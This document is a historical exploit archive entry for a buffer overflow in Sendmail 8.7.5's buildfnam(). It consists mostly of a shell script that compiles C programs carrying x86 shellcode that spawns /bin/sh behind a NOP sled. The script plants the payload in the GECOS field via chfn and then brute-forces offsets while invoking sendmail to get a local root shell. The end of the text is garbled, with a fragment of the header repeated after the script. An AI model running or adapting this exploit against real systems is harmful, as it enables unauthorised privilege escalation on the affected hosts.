+++++ *NIX Sendmail (8.7.5) - Buffer Overflow - Newest sendmail exploit : # Hrm... and Eric Allman told me to my face that there were *no* buffer # overflows in 8.7.5 -- .mudge # This works on systems that have the chpass program runable by # users. Tested on FreeBSD, though the vulnerability exists in all # Sendmail8.7.5. Granted you need to be able to change your gecos field ;-) # # The problem is in buildfnam() which lives in util.c - it treats # the static allocated array nbuf[MAXSIZE+1], from recipient.c, in # an unbounded fashion. # # mudge@l0pht.com CC=/usr/bin/gcc RM=/bin/rm cat > a_run.c << EOF main(int argc, char *argv[]) { long addr=0xefbfcea8; char *ptr = (char *)&addr; char foo[5]; int i, j; if (argc != 2){ printf("Usage: %s offset\n", argv[0]); exit(1); } addr += atoi(argv[1]); printf("Full Name: CCCCCCCCCC"); if (atoi(argv[1])%2){ for(i=0; i<60; i++) printf("AAAA"); } else{ for(i=0; i<60; i++) printf("BBBB"); } for (i = 0; i< 5; i++){ printf("%c%c%c%c", *(ptr+2), *(ptr+3), *(ptr), *(ptr+1)); } } EOF cat > make_gecos.c << EOF ~ #include main(int argc, char *argv[]) { int i; char mach_codes[] = "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; for (i=0; i<40; i++) printf("%c", 0x90); printf("%s", mach_codes); } EOF $CC -o make_gecos make_gecos.c if [ ! -x make_gecos ] ; then echo failed to build make_asdf exit 1 fi $CC a_run.c if [ ! -x a.out ] ; then echo failed to build asdf exit 1 fi $RM a_run.c make_gecos.c echo "1 - Change the variables in the sploit.sh script" echo "2 - run make_gecos > tmpr" echo "3 - setenv MANPATH=\"\`cat ./tmpr\`\" " echo "4 - run the sploit.sh sploit.sh script with an argument" echo " of around 3000" # this argument varies depending upon what lives in ones # environment variables, what the paths are, etc. etc. # on a pretty stock environment in a FreeBSD setup I hit # around 3900 sploit.sh 600 0 3 704 6213376125 5634 #!/bin/sh if [ $# = 1 ] ; then i=$1 else i=0 fi FILE=/usr/home/username/wip/overflow/sendmail/ouch TMP=/usr/home/username/wip/overflow/sendmail/cleanup EDITOR=/usr/bin/ex export EDITOR while `[ $i -le 16048 ]` do # ./m3 ${i} > $FILE # ./make_gecos ${i} > $FILE ./a.out ${i} > $FILE chfn username << FOE 3 d 2 r ./ouch wq! FOE sync sync echo "using arg of [0xefbfcea8 (hex) + ${i}(dec)]" /usr/sbin/sendmail username i=`expr $i + 1` done in # an unbounded fashion. # # mudge@l0pht.com CC=/usr/bin/